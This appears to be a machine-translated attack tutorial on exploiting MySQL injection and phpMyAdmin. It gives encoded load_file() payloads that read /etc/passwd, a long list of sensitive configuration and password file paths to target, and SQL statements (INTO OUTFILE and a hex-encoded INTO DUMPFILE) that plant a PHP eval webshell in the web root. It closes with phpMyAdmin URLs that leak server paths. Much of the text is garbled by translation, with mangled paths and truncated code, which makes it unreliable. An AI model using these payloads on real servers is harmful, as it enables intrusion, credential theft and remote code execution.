Attackers can use load_file () to obtain sensitive files and phpmyadmin to obtain webshells.

Related paths of the load_file () function used for mysql data injection to view its files: 1. replace (load_file (0x2F6574632F706173737764), 0x3c, 0x20) 2. replace (load_file (char (47,101,116, 99,47, 112,97, 115,115,119,100), char (60), char (32) the above two are viewing a PHP File

Load _ used for mysql data Injection _File() Related paths for the function to view its files:

1. replace (load_file (0x2F6574632F706173737764), 0x3c, 0x20)
2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two are to viewPHPThe Code is fully displayed in the file. Some characters are not replaced in some cases. For example, if <is replaced with a space, the webpage is returned, and the Code cannot be viewed.
3. load_file (char (47) can be used to list the root directories of FreeBSD and Sunos systems.
4./etc/Httpd/Conf/httpd. conf or/usr/local/apche/conf/httpd. conf to view the configuration file of the linux APACHE Virtual Host
5. Run c: Program FilesApache GroupApacheconf httpd. conf or C: apacheconf httpd. conf to view the apache file in WINDOWS.
6. Run c:/Resin-3.0.14/conf/resin. conf to view the resin file configuration of the website developed by jsp.
7. View c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. confLinuxConfigured JSP Virtual Host
8. d: APACHEApache2confhttpd. conf
9. C: Program Filesmysqlmy. ini
10. ../themes/darkblue_orange/layout. INc.PhpPhpmyadmin burst path
11. c: windowssystem32inetsrvMetaBase. xml: view the virtual host configuration file of IIS
12. view the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/conf/RESIN. conf.
13./usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above.
14./usr/local/app/apache2/conf/ExTrA/httpd-vhosts.conf apashe vm View
15. View firewall policies in/etc/sysconfig/iptables.
16. Equivalent settings of usr/local/app/php5/lib/php. ini PHP
17./etc/my. cnf MYSQL configuration file
18./etc/rEdSystem Version of hat-release Red hat
19. C: mysqldatamysqluser. MYD has the user password in MYSQL.
20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.
21./usr/local/app/php5/lib/php. ini // PHP settings
22,/usr/local/app/apache2/conf/extra/httpd-vhosts.conf // virtual website settings
23. c: Program FilesRhinoSoft. comServ-UServUDaemon.ini
24. c: windowsmy. ini
Else ---------------------------------------------------------------------------------------------------------------------------------
1. How to get the login password?
2. Access: http: // url/phpmyadmin/libraries/select_lang.lib.php to obtain the physical path.
3. Select a Database and run the following statement.
---- Start code ---
Create TABLE a (cmd text not null );
Insert INTO a (cmd) VALUES (' Eval($ _ POST [cmd]);?> ');
Select cmd from a into outfile 'x:/phpMyAdmin/libraries/d. php ';
Drop table if exists;
---- End code ---
4. If there is no accident, the corresponding website will get webshell.
Like mssql, a table is created, a Trojan is inserted in the table, and exported to the web directory!
Supplement: it can also be used directly.DuMpfile to get shell
Select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php. php ';
The encrypted part is lanker's one-sentence password: cmd
Bytes --------------------------------------------------------------------------------------------------------
Multiple files in the phpmyadmin libraries Directory have the absolute path leakage vulnerability --

Http: // target/phpmyadmin/libraries/string. lib. php
Http: // target/phpmyadmin/libraries/string. lib. php
Http: // target/phpmyadmin/libraries/database_interface.lib.php
Http: // target/phpmyadmin/libraries/db_table_exists.lib.php
Http: // target/phpmyadmin/libraries/display _Export. Lib. php
Http: // target/phpmyadmin/libraries/header_meta_style.inc.php
Http: // target/phpmyadmin/libraries/McRypt. lib. php